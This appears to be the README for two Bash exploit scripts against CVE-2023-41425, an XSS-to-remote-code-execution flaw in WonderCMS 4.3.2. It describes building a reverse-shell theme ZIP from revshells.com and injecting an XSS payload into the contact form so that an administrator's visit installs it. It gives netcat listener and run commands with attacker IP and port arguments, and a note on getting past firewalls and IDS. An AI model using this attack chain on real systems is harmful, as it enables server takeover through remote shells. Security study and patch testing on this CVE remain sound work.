These scripts exploit an XSS (Cross-Site Scripting) vulnerability in WonderCMS 4.3.2 to achieve Remote Code Execution (RCE). The XSS payload, when triggered by the admin, automatically installs a reverse shell on the target server by leveraging a crafted malicious theme module. The reverse shell is obtained from revshells.com and executed, granting the attacker remote access to the server.
To successfully run either script, the following tools and conditions are required:
- Bash Shell: Both scripts are written for Linux environments using the Bash shell.
- netcat (nc): Used to listen for the reverse shell connection.
- Python3: A simple Python HTTP server is used to host the XSS payload.
- WonderCMS 4.3.2: The target must be running a vulnerable version of WonderCMS.
- Administrator Interaction: The payload requires an admin to trigger the XSS, which results in the reverse shell execution.
- revshells.com: The reverse shell payload is downloaded dynamically from revshells.com.
This version of the exploit automatically checks for an active nc listener, downloads the reverse shell, starts the HTTP server, sends the payload, and waits for the admin to trigger the reverse shell.
- Automatic Reverse Shell Setup: Downloads a pre-generated reverse shell from revshells.com.
- XSS Payload Injection: Injects an XSS payload in the target's contact form.
- HTTP Server Management: Automatically starts a Python HTTP server to host the reverse shell payload.
- nc Listener Check: Ensures the listener is running before proceeding.
- Payload Auto-send: Sends the payload automatically without user interaction.
- Ensure the
nclistener is running on the specified port:nc -nvlp <PORT>
- Run the script with the following command:
Example:
./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
- Download Reverse Shell: The script downloads the reverse shell from
revshells.com. - Modify the Reverse Shell: The reverse shell script is updated with the attacker's IP and port.
- Create ZIP Payload: A ZIP file containing the reverse shell is created.
- Craft XSS Payload: An XSS payload that installs the reverse shell is generated and injected into the vulnerable contact form.
- Auto-Start HTTP Server: The script starts a Python HTTP server to serve the malicious payload.
- Auto-Send Payload: The XSS payload is sent to the admin automatically.
Use the exploit provided by the script in Website field...
This version requires the user to manually manage the nc listener and the XSS payload triggering. It is more suited for scenarios where automatic processes are not desirable.
- Manual Reverse Shell Setup: The user is responsible for ensuring the listener is running.
- Manual XSS Triggering: The script provides the malicious link to be sent to the admin, but the payload must be triggered manually.
- HTTP Server Management: Starts a Python HTTP server to host the XSS payload.
- Ensure the
nclistener is running on the specified port:nc -nvlp <PORT>
- Run the script with the following command:
Example:
./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
- Download Reverse Shell: Downloads a reverse shell from
revshells.com. - Modify the Reverse Shell: Updates the reverse shell with the attacker's IP and port.
- Create ZIP Payload: Creates a ZIP file containing the reverse shell.
- Craft XSS Payload: Generates an XSS payload that installs the reverse shell.
- Display Malicious Link: Displays the link that needs to be sent to the admin for triggering.
- Start HTTP Server: Starts a Python HTTP server to host the payload.
- Admin Interaction: Both exploits rely on the WonderCMS admin triggering the XSS payload by visiting the vulnerable page. Once triggered, the reverse shell is established with the attacker's machine.
- Firewall/IDS/IPS: Be cautious when running these exploits on environments protected by firewalls or Intrusion Detection Systems (IDS) that might block or alert on suspicious activity.
- Responsible Disclosure: If you find that a target is vulnerable, always follow ethical guidelines and report the vulnerability to the appropriate parties.